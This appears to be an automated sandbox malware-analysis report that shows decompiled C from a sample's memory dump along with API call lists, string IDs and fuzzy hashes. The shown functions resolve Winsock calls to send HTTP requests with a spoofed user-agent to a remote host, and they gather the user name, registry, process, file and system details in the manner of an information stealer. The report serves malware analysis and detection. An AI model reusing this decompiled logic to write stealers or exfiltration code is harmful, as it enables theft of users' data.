                                                                                                                                                                                              				E00403980(_v16);
                                                                                                                                                                                              				E00403980(_a16);
                                                                                                                                                                                              				E00403980(_a12);
                                                                                                                                                                                              				_push(_t228);
                                                                                                                                                                                              				_push(0x418535);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t228 + 0xfffffa30;
                                                                                                                                                                                              				E0040357C( &_v28, "wsock32.dll");
                                                                                                                                                                                              				_t196 = GetModuleHandleA(E004039E8( &_v28));
                                                                                                                                                                                              				if(_t196 == 0) {
                                                                                                                                                                                              					_t193 = LoadLibraryA(E004039E8( &_v28)); // executed
                                                                                                                                                                                              					_t196 = _t193;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
                                                                                                                                                                                              				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
                                                                                                                                                                                              				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
                                                                                                                                                                                              				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
                                                                                                                                                                                              				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
                                                                                                                                                                                              				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
                                                                                                                                                                                              				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
                                                                                                                                                                                              				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
                                                                                                                                                                                              				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
                                                                                                                                                                                              					E004034E4( &_v24);
                                                                                                                                                                                              					_push( &_v432);
                                                                                                                                                                                              					_push(E00404EE4(2, 2));
                                                                                                                                                                                              					if( *0x41c89c() == 0) {
                                                                                                                                                                                              						_t141 =  *0x41c8a4(2, 1, 0); // executed
                                                                                                                                                                                              						_t225 = _t141;
                                                                                                                                                                                              						if(_t225 != 0xffffffff) {
                                                                                                                                                                                              							_v448 = 2;
                                                                                                                                                                                              							_t144 =  *0x41c8a0(E00403990(_v8)); // executed
                                                                                                                                                                                              							if(_t144 != 0) {
                                                                                                                                                                                              								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
                                                                                                                                                                                              								_v446 =  *0x41c8b0(_a8);
                                                                                                                                                                                              								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
                                                                                                                                                                                              								_t243 = _t151;
                                                                                                                                                                                              								if(_t151 == 0) {
                                                                                                                                                                                              									E00403850();
                                                                                                                                                                                              									E00403D2C( &_v1480, _v1484);
                                                                                                                                                                                              									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
                                                                                                                                                                                              									E00403D2C( &_v1492, _a12);
                                                                                                                                                                                              									E00403E1C();
                                                                                                                                                                                              									E0040377C( &_v20, _v1476);
                                                                                                                                                                                              									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
                                                                                                                                                                                              									E004034E4( &_v24);
                                                                                                                                                                                              									do {
                                                                                                                                                                                              										E004034E4( &_v32);
                                                                                                                                                                                              										E004028E0( &_v1472, 0x400);
                                                                                                                                                                                              										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
                                                                                                                                                                                              										E004035D4( &_v32, _t197,  &_v1472);
                                                                                                                                                                                              										E00403798( &_v24, _v32);
                                                                                                                                                                                              									} while (_t197 > 0);
                                                                                                                                                                                              									 *0x41c8b8(_t225);
                                                                                                                                                                                              									_push( &_v24);
                                                                                                                                                                                              									_push(E00403A78(0x418680, _v24) + 4);
                                                                                                                                                                                              									_t186 = E00403790(_v24);
                                                                                                                                                                                              									_pop(_t222);
                                                                                                                                                                                              									E004039F0(_v24, _t186, _t222);
                                                                                                                                                                                              									E00403538(_a4, _v24);
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t206);
                                                                                                                                                                                              				 *[fs:eax] = _t206;
                                                                                                                                                                                              				_push(E0041853C);
                                                                                                                                                                                              				E00403B98( &_v1492, 2);
                                                                                                                                                                                              				E004034E4( &_v1484);
                                                                                                                                                                                              				E00403B98( &_v1480, 2);
                                                                                                                                                                                              				E00403508( &_v32, 7);
                                                                                                                                                                                              				return E00403508( &_a12, 2);
                                                                                                                                                                                              			}































                                                                                                                                                                                              0x004184ea
                                                                                                                                                                                              0x004184fa
                                                                                                                                                                                              0x00418505
                                                                                                                                                                                              0x00418515
                                                                                                                                                                                              0x00418522
                                                                                                                                                                                              0x00418534

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                                                                                                                                                                                              • WSAStartup.WS2_32(00000000,?), ref: 0041830C
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 00418320
                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00418343
                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 00418363
                                                                                                                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
                                                                                                                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 004184A9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
                                                                                                                                                                                              • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                                                                                                              • API String ID: 4159890453-3355491746
                                                                                                                                                                                              • Opcode ID: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                              • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065CC(void* __eax) {
                                                                                                                                                                                              				short _v516;
                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				DWORD* _t15;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t15 =  &_v516;
                                                                                                                                                                                              				_t12 = __eax;
                                                                                                                                                                                              				 *_t15 = 0xff;
                                                                                                                                                                                              				_t7 = GetUserNameW( &_v516, _t15); // executed
                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                              					return E00403B80(_t12);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return E00403D10(_t12, 0x100,  &_v516);
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                              • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                                                                                                                                                                                              • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040561C() {
                                                                                                                                                                                              				struct HINSTANCE__* _t110;
                                                                                                                                                                                              				struct HINSTANCE__* _t112;
                                                                                                                                                                                              				struct HINSTANCE__* _t114;
                                                                                                                                                                                              				struct HINSTANCE__* _t116;
                                                                                                                                                                                              				struct HINSTANCE__* _t117;
                                                                                                                                                                                              				struct HINSTANCE__* _t120;
                                                                                                                                                                                              				_Unknown_base(*)()* _t121;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *0x41c678 = LoadLibraryA("kernel32.dll");
                                                                                                                                                                                              				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
                                                                                                                                                                                              				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
                                                                                                                                                                                              				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
                                                                                                                                                                                              				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
                                                                                                                                                                                              				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
                                                                                                                                                                                              				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
                                                                                                                                                                                              				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
                                                                                                                                                                                              				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
                                                                                                                                                                                              				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
                                                                                                                                                                                              				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
                                                                                                                                                                                              				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
                                                                                                                                                                                              				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
                                                                                                                                                                                              				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
                                                                                                                                                                                              				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
                                                                                                                                                                                              				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
                                                                                                                                                                                              				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
                                                                                                                                                                                              				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
                                                                                                                                                                                              				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
                                                                                                                                                                                              				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
                                                                                                                                                                                              				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
                                                                                                                                                                                              				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
                                                                                                                                                                                              				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
                                                                                                                                                                                              				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
                                                                                                                                                                                              				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
                                                                                                                                                                                              				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
                                                                                                                                                                                              				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
                                                                                                                                                                                              				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
                                                                                                                                                                                              				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
                                                                                                                                                                                              				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
                                                                                                                                                                                              				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
                                                                                                                                                                                              				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
                                                                                                                                                                                              				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
                                                                                                                                                                                              				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
                                                                                                                                                                                              				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
                                                                                                                                                                                              				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
                                                                                                                                                                                              				 *0x41c708 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                              				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
                                                                                                                                                                                              				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
                                                                                                                                                                                              				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
                                                                                                                                                                                              				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
                                                                                                                                                                                              				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
                                                                                                                                                                                              				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
                                                                                                                                                                                              				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
                                                                                                                                                                                              				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
                                                                                                                                                                                              				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
                                                                                                                                                                                              				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
                                                                                                                                                                                              				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
                                                                                                                                                                                              				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
                                                                                                                                                                                              				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
                                                                                                                                                                                              				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
                                                                                                                                                                                              				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
                                                                                                                                                                                              				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
                                                                                                                                                                                              				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
                                                                                                                                                                                              				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
                                                                                                                                                                                              				 *0x41c754 = LoadLibraryA("user32.dll");
                                                                                                                                                                                              				_t110 =  *0x41c754; // 0x74ea0000
                                                                                                                                                                                              				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
                                                                                                                                                                                              				_t112 =  *0x41c754; // 0x74ea0000
                                                                                                                                                                                              				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
                                                                                                                                                                                              				_t114 =  *0x41c754; // 0x74ea0000
                                                                                                                                                                                              				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
                                                                                                                                                                                              				_t116 = LoadLibraryA("shell32.dll"); // executed
                                                                                                                                                                                              				 *0x41c764 = _t116;
                                                                                                                                                                                              				_t117 =  *0x41c764; // 0x75ed0000
                                                                                                                                                                                              				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
                                                                                                                                                                                              				 *0x41c76c = LoadLibraryA("ntdll.dll");
                                                                                                                                                                                              				_t120 =  *0x41c76c; // 0x779c0000
                                                                                                                                                                                              				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
                                                                                                                                                                                              				 *0x41c770 = _t121;
                                                                                                                                                                                              				return _t121;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,EnumDisplayDevicesW), ref: 00405A14
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,wvsprintfA), ref: 00405A29
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,GetKeyboardLayoutList), ref: 00405A3E
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(75ED0000,ShellExecuteExW), ref: 00405A62
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,75ED0000,ShellExecuteExW,shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                                                                                                                                                                                              • GetProcAddress.KERNEL32(779C0000,RtlComputeCrc32), ref: 00405A86
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				void* _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				signed int _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v81;
                                                                                                                                                                                              				char _v82;
                                                                                                                                                                                              				char _v83;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char* _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char* _v104;
                                                                                                                                                                                              				void* _v108;
                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                              				char _v241;
                                                                                                                                                                                              				intOrPtr _v276;
                                                                                                                                                                                              				intOrPtr _v280;
                                                                                                                                                                                              				intOrPtr _v284;
                                                                                                                                                                                              				intOrPtr _v288;
                                                                                                                                                                                              				intOrPtr _v292;
                                                                                                                                                                                              				intOrPtr _v296;
                                                                                                                                                                                              				intOrPtr _v300;
                                                                                                                                                                                              				char _v304;
                                                                                                                                                                                              				char _v308;
                                                                                                                                                                                              				char _v312;
                                                                                                                                                                                              				intOrPtr _v316;
                                                                                                                                                                                              				char _v320;
                                                                                                                                                                                              				char _v324;
                                                                                                                                                                                              				char _v328;
                                                                                                                                                                                              				char _v332;
                                                                                                                                                                                              				char _v336;
                                                                                                                                                                                              				char _v340;
                                                                                                                                                                                              				void* _v344;
                                                                                                                                                                                              				void* _v348;
                                                                                                                                                                                              				void* _v352;
                                                                                                                                                                                              				char _v356;
                                                                                                                                                                                              				char _v360;
                                                                                                                                                                                              				char _v364;
                                                                                                                                                                                              				char _v368;
                                                                                                                                                                                              				char _v372;
                                                                                                                                                                                              				char _v376;
                                                                                                                                                                                              				char _v380;
                                                                                                                                                                                              				char _v384;
                                                                                                                                                                                              				char _v388;
                                                                                                                                                                                              				char _v392;
                                                                                                                                                                                              				char _v396;
                                                                                                                                                                                              				char _v400;
                                                                                                                                                                                              				char _v404;
                                                                                                                                                                                              				char _v408;
                                                                                                                                                                                              				char _v412;
                                                                                                                                                                                              				char _v416;
                                                                                                                                                                                              				char _v420;
                                                                                                                                                                                              				char _v424;
                                                                                                                                                                                              				char _v428;
                                                                                                                                                                                              				char _v432;
                                                                                                                                                                                              				char _v436;
                                                                                                                                                                                              				char _v440;
                                                                                                                                                                                              				char _v444;
                                                                                                                                                                                              				char _v448;
                                                                                                                                                                                              				char _v452;
                                                                                                                                                                                              				intOrPtr _v456;
                                                                                                                                                                                              				intOrPtr _v460;
                                                                                                                                                                                              				char _v464;
                                                                                                                                                                                              				char _v468;
                                                                                                                                                                                              				char _v472;
                                                                                                                                                                                              				char _v476;
                                                                                                                                                                                              				char _v480;
                                                                                                                                                                                              				char _v484;
                                                                                                                                                                                              				char _v488;
                                                                                                                                                                                              				char _v492;
                                                                                                                                                                                              				char _v496;
                                                                                                                                                                                              				char _v500;
                                                                                                                                                                                              				char _v504;
                                                                                                                                                                                              				char _v508;
